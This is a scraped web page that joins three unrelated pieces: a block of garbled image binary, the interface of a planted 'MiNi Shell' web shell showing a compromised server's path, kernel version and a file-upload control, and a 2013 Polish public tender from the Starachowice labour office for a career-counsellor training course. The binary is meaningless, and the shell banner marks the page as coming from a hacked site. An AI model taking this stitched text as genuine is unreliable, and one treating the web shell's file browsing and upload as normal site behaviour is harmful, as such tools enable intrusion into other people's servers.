JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/101339-N-2013.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia pn. Analiza preferencji i predyspozycji klienta 
w planowaniu kariery przy wykorzystaniu elektronicznych narzędzi diagnostycznych dla 
5 doradców zawodowych zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z POKL - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2. Znak sprawy: ZP/11/2013.</b><br>
<b>Numer ogłoszenia: 101339 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Analiza preferencji i predyspozycji klienta 
w planowaniu kariery przy wykorzystaniu elektronicznych narzędzi diagnostycznych dla 
5 doradców zawodowych zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z POKL - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2. Znak sprawy: ZP/11/2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia pn. Analiza preferencji i predyspozycji klienta 
w planowaniu kariery przy wykorzystaniu elektronicznych narzędzi diagnostycznych dla 
5 doradców zawodowych zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych 
i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie. Znak sprawy: ZP/11/2013. 
Kod zgodnie ze słownikiem CPV 80510000-2.

1. Celem szkolenia jest wprowadzenie do pracy doradcy zawodowego elektronicznych testów 
     i narzędzi do badania klienta wraz z modułami analizy danych, co pozwoli na szybkie 
     uzyskanie pełniejszego obrazu klienta w krótszym czasie.
2.  Program szkolenia musi zawierać następujące bloki tematyczne:
       - Opanowanie narzędzi do tworzenia profilu i mapy kompetencji klienta.
       - Określenie poziomu motywacji podstawą do efektywnego planowania.
       - Umiejętność tworzenia profilu zawodowego osoby diagnozowanej.
3.  Metoda szkolenia: warsztaty multimedialne przeprowadzone przy pomocy notebooków.
4.  Szkolenie ma zostać zorganizowane i przeprowadzone do dnia 25.09.2013 r.
5.  Minimalna liczba godzin szkolenia - 20 godzin.
6.  Czas trwania szkolenia 3 dni.
7. Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby zajęcia
     odbywały się codziennie w dni powszednie.
8. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz w dni ustawowo 
     wolne od pracy.
9.  Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 
10.Wykłady muszą się odbywać w sali wykładowej przystosowanej do tego typu celów.
11.Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego 
     przeprowadzenia szkolenia.
12.Każdy z uczestników w trakcie szkolenia będzie miał do własnej dyspozycji narzędzie 
     multimedialne w postaci notebooka wyposażone w komplet modułów i testów diagnostycznych do 
     pracy z klientem.  
13.Wykonawca zapewni w trakcie trwania szkolenia i w miejscu zakwaterowania oraz w przypadku  
     organizowania transportu dla uczestników szkolenia warunki zgodne z przepisami bezpieczeństwa  
     i higieny pracy. 
14.Wykonawca zapewni odpowiednią kadrę szkoleniową, opiekuna grupy oraz opracuje szczegółowy 
     harmonogram szkolenia.
15.Wykonawca zobowiązany jest do upowszechniania informacji poprzez oznaczenie sal 
      wykładowych, materiałów dydaktycznych oraz wszelkiej dokumentacji związanej z organizacją 
      szkolenia, że projekt jest współfinansowany ze środków Unii Europejskiej w ramach 
      Europejskiego Funduszu Społecznego zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
      w ramach Programu Operacyjnego Kapitał Ludzki
16. Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały szkoleniowe w formie 
       skryptów, materiałów biurowych (przybory piśmienne, notatnik, itp.), pomoce dydaktyczne  
       niezbędne do realizacji szkolenia oraz szczegółowy harmonogram szkolenia 
17. Po zakończeniu szkolenia Wykonawca zamówienia wyda zaświadczenie zgodne 
        z rozporządzeniem Ministra Edukacji Narodowej z dnia 11.01.2012 r,  oznakowane zgodnie 
        z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał 
        Ludzki.
18. Miejsce szkolenia oraz zakwaterowania uczestników szkolenia nie może być usytuowane 
        bliżej niż 20 km i nie dalej niż 300 km od granicy miasta Starachowice.
19. Wykonawca zapewni przewóz dla 5 uczestników szkolenia z siedziby Zamawiającego tj. 
        Starachowice ul. Radomska 76 do miejsca szkolenia i z powrotem lub pokryje koszty związane 
        z dojazdem 5 uczestników szkolenia ze Starachowic do miejsca szkolenia i z powrotem.   
20. Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników 
       szkolenia od pierwszego do ostatniego dnia szkolenia a w przypadku organizowania przez 
       Wykonawcę przewozu dodatkowo na okres podróży. 
21.  Wykonawca zapewni po dwa noclegi dla 5 osób skierowanych na szkolenie. 
22. Uczestnicy szkolenia zostaną zakwaterowani w hotelu co najmniej dwu gwiazdkowym lub 
       pensjonacie o równorzędnym standardzie w pokojach 2 lub 1 osobowych wyposażonych w pełny 
       węzeł sanitarny.
23. Wykonawca zapewni podczas trwania szkolenia całodzienne wyżywienie dla uczestników  
        szkolenia (2 śniadania, 3 obiady, 2 kolacje) oraz serwis kawowy podczas trwania zajęć. Posiłki 
        mają być podawane w innej sali niż wykładowa przystosowanej do tego celu.  
24. W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu rozpoczęcia 
       szkolenia Wykonawca zapewni dodatkowy nocleg zgodny z w/w opisem, dodatkową kolację
       w przeddzień szkolenia oraz śniadanie w dniu szkolenia. 
25. Zajęcia dydaktyczne muszą odbywać się w miejscu zakwaterowania uczestników szkolenia lub 
       w odległości nie większej niż 1 km od miejsca zakwaterowania. W przypadku gdy zajęcia  
       odbywać się będą w odległości większej niż 1 km od miejsca zakwaterowania uczestników 
       Wykonawca zapewni transport na i z miejsca odbywania zajęć.  
26. Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót uczestników 
       szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia.
27. Zamawiający zgodnie z art. 36 ust 4 ustawy prawo zamówień publicznych żąda wskazania 
       w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
28.  Zamawiający przewiduje:   
       - ze strony Wykonawcy możliwość zmiany: opiekuna grupy, kadry dydaktycznej mającej 
       prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
       której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
       zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
       kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
       Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  
       przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający  
       dopuszcza zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia 
       wskazane przez Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał 
       Wykonawca w złożonej ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający 
       przewiduje zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania szkolenia 
       określonego w załączniku oraz ofercie jednostki szkolącej pod warunkiem, że wymieniony sprzęt 
       znajdzie zastosowanie  podczas przeprowadzania tego szkolenia. Zmiana ta wymaga jedynie 
       akceptacji Zamawiającego.
       - ze strony Zamawiającego: zmianę terminu wykonania zamówienia (wcześniejsze wykonanie 
       przedmiotu zamówienia), zmianę terminu przeprowadzenia szkolenia, zmianę liczby uczestników 
       szkolenia przed jego rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia 
       Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby 
       osób przeszkolonych i ceny jednostkowej).
       Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników szkolenia 
       określonej w opisie przedmiotu zamówienia.
       Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych  
       w umowie. 
       W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu 
       zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku.
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
       - opanowanie narzędzi do tworzenia profilu i mapy kompetencji klienta.
       - określenie poziomu motywacji podstawą do efektywnego planowania.
       - umiejętność tworzenia profilu zawodowego osoby diagnozowanej.
    b)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
  w ramach Programu Operacyjnego Kapitał Ludzki. 
    c) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
          oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór zaświadczenia o ukończeniu kursu zgodny z rozporządzeniem Ministra Edukacji 
          Narodowej z dnia 11.01.2012 r,  oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
          projektów w ramach Programu Operacyjnego Kapitał Ludzki.   
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.
Przed rozliczeniem finansowym przedmiotu zamówienia Zamawiający w formie protokołu dokona odbioru zadania zleconego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
  - załącznik nr 1 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie z należytą starannością w okresie   
   ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
   krótszy w tym okresie przynajmniej jednego szkolenia w tematyce przedmiotu zamówienia 
   przeprowadzonego dla pracowników instytucji rynku pracy.
- Ocena nastąpi na podstawie złożonego dokumentu potwierdzającego przeprowadzenie z należytą 
   starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia w tematyce 
   przedmiotu zamówienia przeprowadzonego dla pracowników instytucji rynku pracy.
  Dokumentem potwierdzającym przeprowadzenie z należytą starannością w okresie ostatnich 3 lat 
  przed upływem terminu składania ofert szkolenia może być dokument, który jednoznacznie 
  potwierdzi należyte wykonanie usługi np.: list referencyjny, protokół odbioru usługi szkoleniowej 
  itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie zamówienia 
  przeprowadził szkolenie w tematyce przedmiotu zamówienia przeprowadzonego dla pracowników 
  instytucji rynku pracy. Dokument ten musi zawierać termin przeprowadzenia tego szkolenia. 
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
   - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych 
   - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem technicznym   
   zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 2 do SIWZ. 
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych
    - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania 
    przedmiotu zamówienia - załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej realizację przedmiotu  
   zamówienia - załącznik nr 4 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument potwierdzający przeprowadzenie z należytą 
   starannością w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia w tematyce 
   przedmiotu zamówienia przeprowadzonego dla pracowników instytucji rynku pracy.
  Dokumentem potwierdzającym przeprowadzenie z należytą starannością w okresie ostatnich 3 lat 
  przed upływem terminu składania ofert szkolenia może być dokument, który jednoznacznie 
  potwierdzi należyte wykonanie usługi np.: list referencyjny, protokół odbioru usługi szkoleniowej 
  itp. wydany przez jednostkę, dla której Wykonawca ubiegający się o udzielenie zamówienia 
  przeprowadził szkolenie w tematyce przedmiotu zamówienia przeprowadzonego dla pracowników 
  instytucji rynku pracy. Dokument ten musi zawierać termin przeprowadzenia tego szkolenia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 15</li>
<li>3 - Kryterium jakości świadczonych usług przez Wykonawcę - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której projekt 
     stanowi załącznik Nr 8 do niniejszej specyfikacji.
2. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu  
     zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
3. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej zmiany 
     okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można  
     było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 
     30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu 
     wykonania części umowy.
4.  Zamawiający przewiduje:   
       - ze strony Wykonawcy możliwość zmiany: opiekuna grupy, kadry dydaktycznej mającej 
       prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana dotyczy osoby, 
       której kwalifikacje były punktowane przy wyborze najkorzystniejszej oferty, konieczne jest by 
       zaproponowana osoba posiadała tożsame kwalifikacje z osobą której zamiana dotyczy a jej  
       kwalifikacje muszą zostać potwierdzone poprzez złożenie kserokopii stosownych dokumentów. 
       Powyższe zmiany nie będą powodować aneksowania umowy, a jedynie wymagają akceptacji  
       przez Zamawiającego po wcześniejszym pisemnym jego powiadomieniu. Zamawiający  
       dopuszcza zmiany miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia 
       wskazane przez Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał 
       Wykonawca w złożonej ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający 
       przewiduje zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania szkolenia 
       określonego w załączniku oraz ofercie jednostki szkolącej pod warunkiem, że wymieniony sprzęt 
       znajdzie zastosowanie podczas przeprowadzania tego szkolenia. Zmiana ta wymaga jedynie 
       akceptacji Zamawiającego.
       - ze strony Zamawiającego: zmianę terminu wykonania zamówienia (wcześniejsze wykonanie 
       przedmiotu zamówienia), zmianę terminu przeprowadzenia szkolenia, zmianę liczby uczestników 
       szkolenia przed jego rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia 
       Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby 
       osób przeszkolonych i ceny jednostkowej). Przez cenę jednostkową należy rozumieć iloraz ceny 
       brutto oferty i liczby uczestników szkolenia określonej w opisie przedmiotu zamówienia.
       Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy wymienionych  
       w umowie. 
       W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto przedmiotu 
       zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku. 
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:
     a) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania   
          projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający następujące bloki 
          tematyczne:
         - opanowanie narzędzi do tworzenia profilu i mapy kompetencji klienta.
         - określenie poziomu motywacji podstawą do efektywnego planowania.
         - umiejętność tworzenia profilu zawodowego osoby diagnozowanej.
    b) harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania projektów   
         w ramach Programu Operacyjnego Kapitał Ludzki. 
    c) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi  
          oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór zaświadczenia o ukończeniu kursu zgodny z rozporządzeniem Ministra Edukacji 
          Narodowej z dnia 11.01.2012 r,  oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
          projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl
Zakładka zamówienia publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 12:00, miejsce: Siedziba Zamawiającego: Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76, w pokoju 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




